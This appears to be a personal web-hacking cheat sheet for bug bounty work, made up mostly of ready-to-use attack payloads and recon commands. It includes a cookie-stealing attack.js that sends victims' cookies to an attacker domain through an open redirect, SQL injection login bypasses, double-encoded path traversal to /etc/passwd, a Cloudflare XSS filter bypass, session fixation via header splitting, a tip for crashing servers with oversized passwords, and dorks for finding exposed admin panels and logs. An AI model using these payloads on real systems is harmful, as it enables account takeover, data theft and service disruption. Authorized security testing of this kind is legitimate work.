                  Logic and tokens
1-  try to login with two users and see tokens from  inspect -> application and compare them  
2-  you can login and copy token and logout and try to put token back see if you can access   
3-  try to forget password and send code then in the same session add any link to internal profile and see if you can access account data ex: /myaccount (don't reload)  ... you can verfiy if you got session id from >> inspect > applicatoin 
4- try to register as admin then you will get inavalible username >> in the same session go to /myaccount  (don't reload) 
5- if transaction of money from hossam to ali then ?from=hossam&to=ali  can make http polution by &from=ali&from=hossam&to=hossam&to=ali
6- login and go to myacount and change the name or id 
7- if found example.com/?lang=en   in link try to find /?lang=database.yml or any senstive files  
8- try to change the email and observe if there is roleid in response if found change it and put it in the request 
9- try to change the id in url in /myaccount if id unpredictable tr to find post of this person and put id in /myaccount
10- if there is downloadable file try to change the name of request file to download and anaylise it 
11- if need to access /admin and can't then remove it from GET and put X-Original-URL: /admin and if there is any parameters put them in GET /?username=admin put if any direcotry put it in X-Original-URL: /admin/changeusername
12- when trying to make action and non authurized try to change method 
13- try to go to /api and change the method to post then put {} in the body to make response json
14- login to page and reset password put 150 chars and reset if applied then put 2500 chars then server will crash 
15- verify that reset and register and change email links are not valid for ever try send them and change account email or password many times and verfiy that if the first link is valid or not 

google dorks : 
  
  site:target.com inurl:adminintitle:login 
  site:website.comintitle:/admin 
  site:website.cominurl:admin
  intitle:admin intext:admin
  index of / site: /etc/certs + "index of /" */* site:example.com
  
  administrator | debug | login | root | wp-login | master | superuser
  example.com/wp-content/uploads/2021/      >> wordpress 
  example.com/wp-inc/       >> for wp-db files
  
  allintext:username filetype:log     >> find log files 
  ext:sql intext:"-- phpMyAdmin SQL Dump"
  
  
  
  
  ----------------------------------------------------------------------------------------------
  https://app.pluralsight.com/course-player?clipId=fc4ed0ad-2778-4318-8b97-9f2010471064
                      BURPSUITE   
  extentions :: 
        1- co2 >> sqli
        2- retire.js >> jquery and javascript files
        3- carbonator   >> automate targeting , spidering , and scanning vulns
        install carbonator in burpsuite pro and run in termainal  ./burpsuite is location of the burp
java -jar -Xmx512M -Djava.awt.headless=true ./burpsuite_pro_v1.8.8.jar http exmple.com 80 / 
        
        
  file upload or download :: file.php%2500.pdf    >> this will ignore .pdf in server but pass filter
  
  
  
  ----------------------------------------------------------------------------------------------
                    JSON EXPLOIT
  
  inject json value of request with xss 
  {"description":"<script>alert(\"hossam\")"}
  try to change the method from get to put to inject database
  
  if json is only in respone take it and modify and then 
  PUT /file.txt           or you can use POST without any parameters in link
  content-type: application/json
  {"description":"<script>alert(\"hossam\");</script>"}

  
  


--------------------------------------------------------------------------------------------
                                    CSRF
  1- try to remove the token and see if the same response
  2- try to make poc by burpsuite and if there is current password try to remove it 
  3- 
  
 
 inrul:login;jsessionid=    >> to see squestoinal session id 
 
 
 
 
 ----------------------------------------------------------------------------------------------
                                open redirect
 https://example.com_https@google.com
 https://victim.com/login/?next=https://your_domain.com
 http://example.com/example.php?url=http://malicious.example.com
 ?next= javascript:$.getScript`https://my_own_domain/attack.js`
 https://victim.com/?next= javascript:$.getScript`https://my_own_domain/attack.js`
 
 attack.js file which will be on my site to extract cookies from user in the other site 
 if(location.host == “my_own_domain”){ 
    Url = new URL(document.location); 
    Parameters = new URLSearchParams(x.search); 
    cookie = Parameters.get(“cookie”); 
    document.write(cookie);
}
else{ 
    var cookie = document.cookie; 
document.location=“https://my_own_domain/attacker.html?cookie="+cookie;}
...................................................................................
apache 2.4.3 has open redirect in server /login >> https://hackerone.com/reports/1782514

http://example.com?redirect_url=javascript://%250Aalert(1)  >> xss via redirect (rxss)










 
 ----------------------------------------------------------------------------------------------
            Combining Session Fixation With Http Request Splitting 
            
http://host/loging\r\nSet-Cookie: SESSIONID=12345\r\nDummy-Header:

Respone
HTTP /1.1 302 
Server: host
Locatoin: https://host/login Set-Cookie:SESSIONID=12345 Dummy-Header: /login


            Combining Session fixation with xss 
https://host/search?q=
document.cookie="SESSIONID=12345;%20path=/;
%20domain=.example.com";



----------------------------------------------------------------------------------------------
                                    BRUTE FORCE 
   
   try to login with invalid password 10 times and then go with valid password if your account was not locked the you can do brute force attack 
 
 
 
 
 
 ----------------------------------------------------------------------------------------------

 
1) go get -u http://github.com/lc/gau
2) echo "http://drive.google.com" | gau
3) Read all the secrets



----------------------------------------------------------------------------------------------
  
  Path traversal to LFI 

/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd

echo http://example.gov | waybackurls | grep /images/

# Double Encode Payload: "www.example.com/images/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"   >> in repeater
  
----------------------------------------------------------------------------------------------
nmap -sV -iL host.txt -oN nmap_scan.txt

Wait a few hours

cat nmap_scan.txt | grep open http://pic.example.com


----------------------------------------------------------------------------------------------
                        SQLI 
          
AAAA')/**/or/**/(select/**/1)=1%23

login 
  ' or 1=1 and email like ('%admin%'); -- 
  any password



----------------------------------------------------------------------------------------------
amass <<
    amass enum -ip -src -brute -df domains
    


---------------------------------------------------------
            (((XSS))
  <script>alert(\"hossam\")</script>        // add \ before " to escape filter
cloudflare bypass 
"-alert(0)-"		X
"-top['al\x65rt'](9)-"	good

example.com/?uid="-top['al\x65rt'](9)-"




------------------------------------------------------------
IDOR :: 
  GO to my account and intercept data then change id 
  go to comments and intercept and change the id 
  go to my cart and intercept and change the id 


----------------------------------------------------------------------------------------------

Directory listing::
        try every dir in debuging folders 
              http://example.com/assets
              https://example.com/app
              http://example.com/en

  
  
  ----------------------------------------------------------------------------------------------
  httpx -l hosts.txt -paths /root/login.txt -threads 50 -random-agent -x GET, POST -tech-detect -status-code -follow-redirects -title -content-lengthhttpx -l hosts.txt -ports 80,443,8009,8080,8081,8090,8180,8443 -paths /root/login.txt -threads 50 -random-agent -x GET, POST -tech-detect -status-code -follow-redirects -title -content-length
----------------------------------------------------------------------------------------------




  shodan :: 
      ssl.cert.subject.cn:"website.com" http.title:"admin"
      ssl: "website.com" http.title: "admin"
      ssl.cert.subject.cn:"website.com" admin
      ssl: "website.com" admin
      
      
 Fofa :: 
      cert = "website.com" && title = "admin"
      cert.subject = "website.com" && title = "admin"
      cert = "website.com" && body = "admin"
      
 Censys:: 
       (services.tls.certificates.leaf_data.issuer.common_name: website.com) AND services.http.response.html_title: admin
       (services.tls.certificates.leaf_data.issuer.common_name: website.com) AND services.http.response.body: admin
       
       
       ---------------------------------------------------------------------------------------------------------
       
                                    NMAP
           
           nmap --script http-methods 192.168.1.1         >> to check the allowable methods 
           
       
       
       
       
       
       
       ---------------------------------------------------------------------------------------------------------------
                                              nuclei
nuclei -u "http://example.com" -t nuclei-templates  -tags xss 		>> to use all xss tags  	
nuclei -u "http://example.com" -t nuclei-templates  -author hossam 	>> for templates of hossam
nuclei -u "http://example.com" -t nuclei-templates -severity low,medium
nuclei -u "http://example.com" -t nuclei-templates -p http://127.0.0.1:8080     >> to send the request to burpsuite
nuclei -header "User-Agent:Mozilla(Hacktify_Hacker)"

cat subdmains | nuclei -t nuclei-templates
nuclei -update

rate limit :: requests per second 
bulk-size :: requests parallel
c templates concurrent 
{{BaseURL}}	https://www.example.com:4444/test/example.txt
{{RootURL}}	https://www.example.com:4444
{{Hostname}}	www.example.com:4444
{{Host}}		www.example.com
{{Port}}		4444	
{{Path}}		/test
{{File}}		/example.txt
{{Scheme}}	Https      
       

       
       
       
       
       
       
       
       
       
       
       
       
       
       
       
       
       
       
       
       
       
       
       
       
       
       
